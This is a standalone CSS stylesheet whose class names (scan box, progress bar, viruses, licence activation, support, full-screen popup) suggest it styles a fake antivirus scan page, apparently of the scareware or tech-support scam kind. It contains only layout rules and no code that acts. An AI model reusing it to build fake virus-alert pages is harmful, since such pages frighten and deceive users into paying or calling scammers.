body{
   overflow-y: hidden;
}
#pop_up_new{
    position: absolute;
    top: 6%;
    z-index: 999999;
    left: 36%;
    background: #1a73e8;
    width: 440px;
    text-align: left;
    padding-top: 4px;
    display: none;
    color: #FFFFFF;
    padding-left: 20px;
    padding-right: 20px;
}

#pop_up_new p{
    font-weight: 500;
    font-size: 12px;
        line-height: 21px;
}
#pop_up_new .action_buttons a.active {
    border: 1px solid #fff;
    font-weight: bold;
}
#pop_up_new .action_buttons a {
    float: right;
    font-size: 12px;
    margin-right: 15px;
    padding: 6px 25px;
    text-decoration: none;
    color: #000 !important;
    border: 1px solid #DDD;
    margin-top: 20px;
    border-radius: 2px;
    margin-bottom: 20px;
}

@keyframes zoominoutsinglefeatured {
    0% {
        transform: scale(1,1);
    }
    50% {
        transform: scale(1.1,1.1);
    }
    100% {
        transform: scale(1,1);
    }
}

@keyframes zoomininsinglefeatured {
    0% {
        transform: scale(1,1);
    }
    50% {
        transform: scale(1.1,1.1);
    }
    100% {
        transform: scale(1,1);
    }
}
.black {
    width: 100%;
    height: 100%;
    background-color: #000;
  opacity: 0;
    transition: 1s;
    position: absolute;
    top: -190px;
}
.bg .bgimg {
    position: absolute;
    top: 60px;
    left: 0px;
    width: 100%;
}
.mn_bxs_header{
    box-shadow: 0 2px 5px 1px rgb(64 60 67 / 16%);
}
.mn_bxs{
        width: 750px;
    height: 536px;
    position: absolute;
    z-index: 99;
    background-color: #000;
    color: #fff;
        left: 26%;
    top: 15%;

}

.mn_bxs2{
     width: 850px;
    height: 600px;
    position: absolute;
    z-index: 9999;
    background-color: #000;
    color: #fff;
        left: 23%;
    top: 7%;
        color: #fff;
    display: none;
}
.mn_bxs3{
     width: 850px;
    height: 600px;
    position: absolute;
    z-index: 999999;
    background-color: #000;
    color: #fff;
    left: 23%;
    top: 7%;
     display: none;
}

.minimize ul{
    list-style-type: none;
    float: right;
}
.minimize ul li{
    float: left;
    display: inline-block;

}
.minimize ul li a img{
width: 140px;
height: auto;
}
.logo{
        margin-left: 20px;
}
.logo img{
    width: 30px;
}
.logo span{
        font-weight: bold;
    margin-left: 6px;
    font-size: 18px;
}
.activate_lic ul{
    list-style-type: none;
    float: right;
}
.activate_lic ul li{
    float: left;
    display: inline-block;

}
.activate_lic ul li a{
    padding: 10px;
}
.activate_lic ul li a button{
       background-color: transparent;
    border: 2px solid #a5add1;
    color: #FFFFFF;
    padding: 5px;
    border-radius: 6px;
    text-align: center;
        position: relative;
    top: -3px;
}

.scan_box{
   width: 700px;
   height: 393px;
   background-color: #000;
   color: #fff;
    box-shadow: 0 2px 5px 1px rgb(64 60 67 / 16%);
    margin: 0px auto;
    margin-top: 20px;
    display: block;
}
.scan_box_header{
    border-bottom:1px solid #c1c1c1;
        height: 50px;
}
.quick_scan{
        margin: 10px 0 0 16px;
}
.quick_scan p{
    font-size: 18px;
    font-weight: bold;
}
.quick_scan img{
    width: 25px;
        margin-right: 6px;

}
.minimize1 ul{
      list-style-type: none;
    float: right;
    margin-top: 10px;
}
.minimize1 ul li{
    float: left;
    display: inline-block;

}
.minimize1 ul li a img{
    width: 140px;
    height: auto;
}
.progress {
      margin-top: 15px;
    width:665px;
    margin-left: 19px;
        height: 25px;
}
.progress-bar{
        height: 25px;
}
#dynamic{
    color: #fff;
    font-size: 15px;
    font-weight: 700;
}
.table_quick .table{
    width: 665px;
    margin-left: 20px;
    border-radius: .25rem;
    margin-top: 20px;
}
.table_quick .table td, .table th{
        padding: .25rem;
}
.table-bordered td, .table-bordered th{
    border-bottom: 1px solid #dee2e6;
    border-bottom-width: 1px;
}
.bt_can{
        margin-top: 103px;
    margin-left: 28px;
}
.bt_can .btn{
        background: transparent;
    color: #000;
    margin-right: 15px;
    height: 30px;
    padding: 12px;
    width: 80px;
    text-align: center;
    line-height: 0px;
}
.bt_can .btn:focus{
box-shadow: none;
}
.bt_can .btn:hover{
background-color: #000;
    border-color: #000;
    color: #fff;
}
.bt_can2 .btn:hover{
background-color: #000;
    border-color: #000;
    color: #fff;
}
.btn-secondary:not(:disabled):not(.disabled).active, .btn-secondary:not(:disabled):not(.disabled):active, .show>.btn-secondary.dropdown-toggle{
    background-color: #000;
    border-color: #000;
    color: #fff;
}

.bt_can2{
           margin-top: 103px;
    float: right;
}
.bt_can2 .btn{
         background: transparent;
    color: #000;
    margin-right: 15px;
    height: 30px;
    padding: 12px;
    width: 160px;
    text-align: center;
    line-height: 0px;
}
.bt_can2 .btn:focus{
box-shadow: none;
}


.counter {
    background-color: #ffffff;
    padding: 0;
    border-radius: 5px;
}
.count-title {

        font-size: 1rem;
    font-weight: bold;
    margin-bottom: 0;
    text-align: left;

 }
.count-text { font-size: 13px; font-weight: normal;  margin-top: 10px; margin-bottom: 0; text-align: center; }
.fa-2x { margin: 0 auto; float: none; display: table; color: #4ad1e5; }
.total_detail ul{
    list-style-type: none;
    float: right;
        margin-top: 8px;
}
.total_detail ul li{
       float: left;
    display: inline-block;
    font-size: 11px;
    padding-left: 10px;
    padding-right: 15px;
    text-align: center;
}
.total_detail ul li a{
    text-decoration: none;
}
.total_detail ul li a p{
    line-height: 12px;
    margin-bottom: 3px;
    color: #000;
    font-weight: 700;
}
.new_heading{
     margin-top: 8px;
         margin-left: 20px;
}
.scan_box2 {
    width: 800px;
    height: 460px;
    box-shadow: 0 2px 5px 1px rgb(64 60 67 / 16%);
    margin: 0px auto;
    margin-top: 20px;
    display: block;
}

.table_quick2 .table {
    width: 767px;
    margin-left: 20px;
    border-radius: .25rem;
    margin-top: 0px;
}
.table_quick2 .table td, .table_quick2 .table th {
    padding: .12rem;
        font-size: 12px;
}
.mar_lef{
    margin-left: 10px;
}
#table_scroll{
     height:60px;
    overflow-y:auto;
    width: 100%;
}
.scan_footer2{
       margin-top: -80px;
}
.table_quick2{
    margin-top: -22px;
}
.bg_blue{
    background-color: #000;
    border-color: #000;
    color: #fff;
}
.total_detail_scan ul{list-style-type: none;}
.total_detail_scan ul li{
float: left;
    display: inline-block;
    width: 140px;
    font-size: 17px;
    font-weight: 600;
}
.total_detail_scan{
padding: 17px 0;
    margin-left: -18px;}

.total_detail_scan ul li:first-child:before{
    border-bottom: 2px solid #204289;
    position: absolute;
    content: '';
    display: block;
    background-color: #fff;
    width: 70px;
    height: 2px;
    top: 42px;
}
.total_detail_scan ul li:first-child{
        width: 90px;
}
.total_detail_scan ul li a{
    text-decoration: none;
}
.pc_desk {
    padding: 63px 2px 0px 46px;
}
.mar_top{
    position: relative;
    top: 16px;
}
.mar_top ul{
list-style-type: none;
padding-inline-start: 0px;
}
.mar_top ul li{
    line-height: 30px;
}
.pause_can{
    margin-top: -66px;
}
.mar_top:before{
         width: 1px;
    height: 200px;
    content: '';
    background-color: #fff;
    position: absolute;
    display: block;
    right: 2px;

}
.scan_dur{}
.scan_dur p{margin-bottom: 0px;}
.scan_footer3 {
       margin-top: 39px;
    margin-left: 0px;
    background: #fff;
    padding: 10px;
}
.viruses img{
    width: 68px;
    padding-top: 5px;
    padding-bottom: 10px;
}
.make_this{
    margin-top: 8px;

}
.viruses{
        margin-left: 45px;
}
.make_this p{
    margin-bottom: 0px;
    font-size: 14px;
    font-weight: 600;
    color: #000;
}


.circular-spinner {
 margin-top: 30px;
    width: 20px;
    height: 20px;
    border: 2px solid white;
    border-top: 2px solid #454d7c;
    border-radius: 100%;
    animation: rotate 1.5s linear infinite;
    float: left;
    position: relative;
    top: -25px;
    left: -4px;
}

@keyframes rotate {
  from {transform: rotate(0);}
  to {transform: rotate(360deg);}
}

#footer {
    width: 100%;
    position: fixed;
    bottom: 0;
    background-color: #fff;
    z-index: 999;
    padding: 10px 34px;
    color: #fff;
    font-size: 18px;
    height: 70px;
    cursor: pointer;
}
#footer .right-foot{

}
#footertxt,
#footertxt2 {
    font-size: 20px;
}
#footertxt img{
    width: 20px;
}
#footertxt2 {
    display: none;
}
#poptxt {
    font-weight: 700;
    padding: 15px 30px;
    min-height: 300px;
    border-radius: 10px;
    border: 1px solid #fff;
    width: 620px;
    display: block;
    margin: 0 auto;
    background-color: #fff;
    z-index: 9999999;
    box-shadow: 5px 5px 15px 5px rgba(0, 0, 0, 0.4);
    position: absolute;
    top: 27%;
        left: 30%;
        cursor: pointer;
        display: none;
}
.ilb {
    display: inline-block;
}
#disclaimer {
    margin: 5px;
    font-size: 17px;
    font-weight: bold;
    text-align: center;
}
.logo3 {
    margin: 0 7px 0 0;
    width: 30px;
    height: 30px;
}
.title2 img {
    position: absolute;
    width: 3%;
    top: 27px;
    right: 17px;
}
#txtintro{
    clear: both;
    padding-top: 0px;
        font-size: 14px;
    font-weight: 600;
    text-align: center;
}
.colo-rd{
    color: #ff0000;
}
.logo_head{
    font-size: 14px;
    font-weight: 600;
    color: #000;
}
#badge {
    margin-top: 22px;
    height: 27px;
}
.title3 {
    font-size: 18px;
    font-weight: 700;
    text-transform: capitalize;
    position: relative;
    width: 3%;
    top: 21px;
    left: 8px;
}
#bottom ul {
    list-style-type: none;
    margin-left: 190px;
}
#bottom ul li {
    display: inline-block;
    float: left;
    padding-left: 20px;
    margin-top: 13px;
}
.button {
    border-radius: 4px;
    padding: 10px 30px 10px 30px;
    color: #fff;
    background-color: #1a73e8;
    font-size: 18px;
    font-weight: 700;
    text-align: center;
    cursor: pointer;
}
.button2 {
    border-radius: 4px;
    padding: 10px 30px 10px 30px;
    color: #000;
    border: 1px solid #000;
    background-color: transparent;
    font-size: 18px;
    font-weight: 700;
    text-align: center;
    cursor: pointer;
}
.button2:hover{
color: #fff;
    background-color: #1a73e8;
    border-color: #1a73e8;

}
.cardcontainer {
  animation: zoominoutsinglefeatured 4s infinite ;
}
@keyframes zoominoutsinglefeatured {
    0% {
        transform: scale(1,1);
    }
    50% {
        transform: scale(1.1,1.1);
    }
    100% {
        transform: scale(1,1);
    }
}

@keyframes zoomininsinglefeatured {
    0% {
        transform: scale(1,1);
    }
    50% {
        transform: scale(1.1,1.1);
    }
    100% {
        transform: scale(1,1);
    }
}
.support{
        font-weight: bold;
    font-size: 17px;
    color: #1a73e8;
}
#bottom {
    margin: 12px 0;
    height: 50px;
    display: flex;
        border-top: 1px solid #d6d5d5;

}
#bottom ul{list-style-type: none;    margin-left: 190px;}
#bottom ul li{
display: inline-block;
    float: left;
    padding-left: 20px;
    margin-top: 13px;
}
#txtclickon1,
#txtclickon2 {
    margin-left: 5px;
}
#txtaex,
#txtatc {
    font-weight: 700;
    text-decoration: underline;
}
#txts3 {
    margin-left: 30px;
}
#instructions {
    display: none;
    margin: 5px 0 -8px;
}
#banner {
    margin: 5px auto;
    display: block;
}

.headers {
    width: 535px;
    margin-top: 7px;
    padding-bottom: 10px;
}
